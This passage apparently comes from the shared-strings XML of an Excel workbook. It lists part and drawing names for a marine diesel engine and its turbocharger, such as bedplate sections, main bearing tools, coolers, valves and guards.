    <t>SCROLL HOUSING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TURBINE INLET</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Guide pin f. partition wall</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PARTITION WALL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COVER FOR SEALING AIR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PARTS F.TURB.INLET</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FOOT FOR TURBOCHARGER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SCREW FOR MANOMETER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DIFFUSOR VANE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PLATE FOR DIFFUSOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CENTER.KEYS F.NOZZLE RING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INNER RING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>OUTER RING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>EXHAUST DIFFUSOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HOUSING-THRUST BEARING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>OIL PUMP-DETAILS (T.C.)</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BEARING HOUSING TURB. END</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STUFFING BOX BUSHING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COOLING WATER INLET</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HOUSING-SIGHT GLASS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>WATER CONNECTION</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BLANK-ROTOR SHAFT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BLANK-TURBINE DISC</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TURBINE DISC</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PREROTOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BLANK-TURBINE BLADE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Nut, round f. hook-wrench</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Mount. of water separator</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SLIDER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SIDE CHAMBER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TUBE PLATE, END COVER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COOLER INSERT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>AIR-COOL. HOUSING SEALING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SPRING, LEAF</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SPRING, SPIRAL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PACKING, AIR COOLER (AIR)</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PACKING, AIR COOLER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Cleaning device</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GASKET FOR REVERSING COVER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Contacting protection</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CU WASHER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GASKET FOR END COVER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CLEANING NOZZLE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Charge air cooler casing</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Mount. of ch air cooler casing</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ARR. FOR DRY CLEANING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Flushing,main engine, testbed</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>QC ME Inductive sensor</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SHAFT IN FLYWHEEL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LIFT AT END BEARING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COUNTERWEIGHT FORE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COUNTERWEIGHT AFT.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>EXHAUST HEADER SUPPORT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CLEANING FLUID</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SILICONE OILS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HOUSE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>RE-CIRCULATOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Varnish, anti rust paint</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Edge protection rubber</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Hauling crown</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Preheating</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Rubber chock</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SOFT BLAST</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Oil</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Cam control</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Clean wire</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Cooling tower</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Heat exchanger</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FW-PUMP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ICS BLOWER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MOTOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SPEC. FOR AUX. BLOWER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ARR. OF EXHAUST PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ARR. OF COMBUST. AIR PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>AIR OUTLET ALTERNATOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DRIVE PULLEY</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>EXPANSION VESSEL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TANK</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MASTER CONTROL DESK</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SW/FW CENTRAL COOLER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Electrostatic filter, complete</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HFO SUPPLY UNIT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HT/LT CENTRAL COOLER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HFO SEPARATOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>RADIATOR COOLER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GAS DRUM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Waste heat recovery boiler</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Air intake pipe arr.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Monitoring for filter</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BLOW-OFF PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DRIFT PIN</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>REVERSING DISC</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DISTRIBUTOR DISC</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STUD, PUSH-PULL ROD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BLIND COVER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SEEGER RING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INJECTION NOZZLE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Mounting parts</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SLEEVES WITH BSP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Service kit</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Roller bearing</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Resistance thermometer Pt100</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Spring for solenoid valve</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Armature for solenoid valve</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Mechanical seal</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>El element</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Sealing tape</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Hole band</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Nylon ball</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SPONGE RUBBER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ADJUST. NON-RETURN VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PIPEHOLDER F.GENERAT.COOL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FITTINGS FOR HOLDER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MAGNET COIL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DRIP PAN</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DIAPHRAGM SPRING VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BUTTERFLY VALVE W. ACTUA.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CUTTING RING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SOLENOID VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ELBOW TEES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FLANGE FOR PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BRACE FOR PREHEATER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BRACE F. COOL. WATER PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>3-WAY VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>3-WAY VALVE WITH ACTUATOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>OIL LEVEL GLASS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CADAM PART-LIST,DEP.2040</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Test Drw/Part (Assembly)</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LUB. AND COOLING OIL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>EXT.PIPE CONNECTIONS ETC.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HD BOLT F.TANKT.LESS PADS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CENTRAL COOLING  NO 2</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MANOEVRING SYSTEM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COMPRESSED AIR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ENGINE CONNECTIONS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FIRE EXTING.SCAV.A. SPACE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>REQ. SPACE F. MAIN ENGINE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SHOP TRIAL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MAIN AND AUX. ENGINE SYS.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GASKETS,SEALINGS,O-RINGS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>JACKET COOLING SYSTEM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TOP BRACING DOUBLE BAR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STATIC THRUST SHAFT LOAD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TCS/PTO/PTI/ SYSTEM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TORSIOGRAPH ARRANGEMENT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PROJECT DOCUMENTATION</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ENGINE ROOM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SHOPTRIAL AND SEATRIAL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Test rig (Research Center T-35)</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Instr.-/Install.CD-ROM - Stand.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SPECIAL DESIGN-WELD.VERS.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Air and gas system</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TURBOCHARGER ARR. LIST</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GEN.INSTRUCTIONS/PLANT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FOLL. PARTS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>T+P ARR.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FACE FOR GENERATOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BEDPLATE-INTERM.-WELDING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>END CROSS GIRDER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BEDPLATE-FORE-MACHINING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BEDPLATE-AFT-WELDING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BEDPLATE-AFT-MACHINING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MOUNT. OF AX. VIBR.DAMPER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Axial Vibr. Damper, upper part</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>OIL SEAL-AXIAL VIB.DAMPER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MOUNT.OF AX.VIBR.MONITOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PROXIMETER ELECT-MOUNTING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PROXIMETER 11 MM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>RUN-OUT METER 8 MM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>RUN-OUT METER 11 MM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>WEB PLATE-COMPLETE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>OIL GROOVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MAIN BEARING, ASSEMBLY</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MAIN BEARING COMPLETE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LUB.OIL PIPE-MAIN BEARING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LUB.OIL PIPE,JOURNAL BRG</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COOLING OIL PIPE-DETAILS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FRONT PLATE ASSEMBLY</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HOLDING DOWN BOLTS ARR.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BEARING CRUSH MEASURING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HYDR.JACK AX.VIBR.DAMPER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LIFT.TOOL FOR CRANKSHAFT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PULLEY F.WIRE F.MAIN BRG.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>WIRE GUIDE - MAIN BEARING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>WIRE GUIDE-JOURN.BEARING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LIFT-TOOL - MAIN BRG.CAP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GUIDE SHELL-MAIN BEARING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LIFT.TOOL MAIN BRG. SHELL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HYDR.TOOL F. MAIN BEARING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>WIRE F.DISM.,MAINB.SHEEL.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HANDLE, DISM. M.BRG SHELL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MOUNT.TOOL,THIN BRG.SHELL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COVER FOR OIL DRAIN</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BRIDGE GAUGE MAIN BEARING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TOOLS-ALIGNM.OF BEDPLATE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LIFTING TOOL FOR AVD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MEAS.TOOL-M.BRG.CLEARANCE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ASSEMBLY OF STUDS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LIFTING OF BEDPLATE FORE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LIFTING OF BEDPLATE AFT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PLAC.OF BRACK. ON B.FRAME</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PLAC. OF BRACKET</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BOX FOR LEVEL ALARM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ASS. OF HOLDING DOWN BOLT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FOUNDATION FRAME WELDED</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DIPSTICK COMPLETE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BASE FRAME MACHINED</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PLATES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BRACKET FOR GENERATOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ANALOG LEVEL INDICATOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FRAMES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FRAMES COMPLETE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FRAME UNIT COMPLETE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FRAME SECTION AFT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HOW MANY DRG</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INSTRUCTION, FRAME BOX</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ASSY OF PMI EQUIPMENT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INTERM.FRAME-COMPLETE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BRACING PLATE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STAY BOLT TUBE COMPLETE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MOUNT.OF LATERAL GUIDES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FRAME-BEDPLATE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FR.GIRDER COMPL.CAM.-FORE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FR.GIRDER COMPL.CAM.-AFT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FR.GIRDER COMPL.EXH.-FORE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FRAME BOX COMPLETE-FORE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FRAME BOX COMPLETE-AFT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FR.GIRDER-CAMSH.SIDE-FORE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FR.GIRDER-CAMSH.SIDE-AFT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FR.GIRDER-EXH.SIDE-FORE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FR.GIRDER-EXH.SIDE-AFT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LOWER FRAME BOX-FORE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FRAMEBOX,CYL.UNIT,WELDING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FRAMEBOX,CHAIN,WELDING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FR.BOX,DIVISION,WELDING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FRAMEBOX,CHAIN,MACHINING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FRAME BOX-FORE-WELDING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Frame box, fore, machining</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FRAME BOX-AFT-WELDING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Frame box, aft, machining</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FR.BOX-INTERM.-FORE-WELD.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FR.BOX-INTERM.-AFT-WELD.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>WEB PLATE COMPLETE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STAY BOLT SELECTION</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STAY BOLT-UPPER COMPLETE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MOUNTING OF BRACING STUDS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SCAVENGE BOX</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DRAIN PIPE-PISTON COOLING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GUIDE BEARING-MOUNTING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>THERMOSENSOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MOUNTING OF COOL.W.NIPPLE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FIXED MILLING BRACKET</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HYDRAULIC NUT F.STAYBOLT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HEATING ROD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TOOLS FOR MS-104</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TOOLS FOR MS-102</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SPANNER RACK</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INTERMEDIATE FRAME MOUNT.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CONNECTION PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TOP GUARD-MOUNTING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GUARD AT CAMSHAFT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SCRAPER RING COMPLETE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SCRAPER RING HOUSING-CPL.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SCRAPER RING HOUSING-UPP.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SCRAPER RING HOUSING-LOW.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>OIL SEAL COVER-COMPLETE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Oil throw ring, complete</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FOOT STRIP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GUARDS-BOTTOM COMPLETE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SHIELD-UPPER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SHIELD-LOWER</t>
